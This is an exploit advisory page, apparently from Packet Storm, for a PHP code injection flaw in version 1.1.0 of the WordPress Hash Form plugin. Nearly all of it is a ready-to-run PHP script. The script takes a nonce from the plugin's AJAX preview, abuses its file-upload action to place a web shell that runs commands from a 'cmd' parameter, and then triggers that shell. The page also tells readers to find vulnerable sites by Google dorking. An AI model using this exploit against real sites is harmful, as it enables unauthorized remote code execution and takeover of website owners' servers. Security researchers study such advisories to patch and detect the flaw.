Headline

WordPress Hash Form 1.1.0 Code Injection

WordPress Hash Form plugin version 1.1.0 suffers from a PHP code injection vulnerability.

1 month ago

#vulnerability #windows #google #js #wordpress #php #auth #ssh #firefox

=============================================================================================================================================
| # Title : WordPress Hash Form 1.1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://plugintests.com/plugins/wporg/hash-form/latest |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {
private $target_url;
private $nonce;

public function __construct($target_url) {  
    $this->target_url = $target_url;  
}

public function check() {  
    if (!$this->isWordPressOnline()) {  
        return 'WordPress does not appear to be online.';  
    }

    $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

    if ($plugin_version === null) {  
        return 'Hash Form plugin does not appear to be installed.';  
    }

    if ($plugin_version === false) {  
        return 'Hash Form plugin is installed but the version is unknown.';  
    }

    if ($plugin_version !== '1.1.0') {  
        return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
    }

    return "Detected Hash Form plugin version: $plugin_version";  
}

public function exploit() {  
    echo "Attempting to retrieve nonce from the target...\n";  
    $this->nonce = $this->getNonce();

    if (!$this->nonce) {  
        die('Failed to retrieve the nonce necessary for file upload.');  
    }

    echo "Nonce retrieved: {$this->nonce}\n";  
    echo "Uploading PHP payload using the retrieved nonce...\n";

    $file_url = $this->uploadPhpFile();  
    if (!$file_url) {  
        die('Failed to upload the PHP payload. Check file permissions and server settings.');  
    }

    echo "PHP payload uploaded successfully to $file_url\n";  
    $this->triggerPayload($file_url);  
}

private function isWordPressOnline() {  
    $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
    return $response !== false;  
}

private function checkPluginVersion($plugin_name, $version) {  
    $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
    if ($response === false) return null;

    preg_match('/"version":"([^"]+)"/', $response, $matches);  
    return $matches[1] ?? false;  // return the version or false if not found  
}

private function getNonce() {  
    $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
    if ($response === false) return null;

    preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
    return $matches[1] ?? null;  
}

private function uploadPhpFile() {  
    $file_content = $this->createPayload();  
    $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

    $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
        'action' => 'hashform_file_upload_action',  
        'file_uploader_nonce' => $this->nonce,  
        'allowedExtensions[0]' => 'php',  
        'sizeLimit' => 1048576,  
        'qqfile' => $file_name,  
        'data' => $file_content  
    ]);

    $json_response = json_decode($response, true);  
    return $json_response['url'] ?? null;  
}

private function triggerPayload($url) {  
    echo "Triggering the payload...\n";  
    $this->sendRequest('GET', $url);  
}

private function sendRequest($method, $uri, $data = []) {  
    $url = $this->target_url . $uri;  
    $options = [  
        'http' => [  
            'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
            'method' => $method,  
            'content' => http_build_query($data),  
        ],  
    ];  
    $context = stream_context_create($options);  
    return @file_get_contents($url, false, $context);  
}

private function createPayload() {  
    // You can define your payload logic here, for now, we return a simple payload  
    $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
    return base64_encode($payload);  
}

}

// استخدام الوحدة
$target_url = 'http://target-wordpress-site.com’;
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة
echo $exploit->check() . "\n";

// تنفيذ الاستغلال
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13

1 day ago

Packet Storm

Debian Security Advisory 5802-1

1 day ago

Packet Storm

Sysax Multi Server 6.99 SSH Denial Of Service

1 day ago

Packet Storm

Sysax Multi Server 6.99 Cross Site Scripting

1 day ago

Packet Storm

IBM Security Verify Access 32 Vulnerabilities

1 day ago

Packet Storm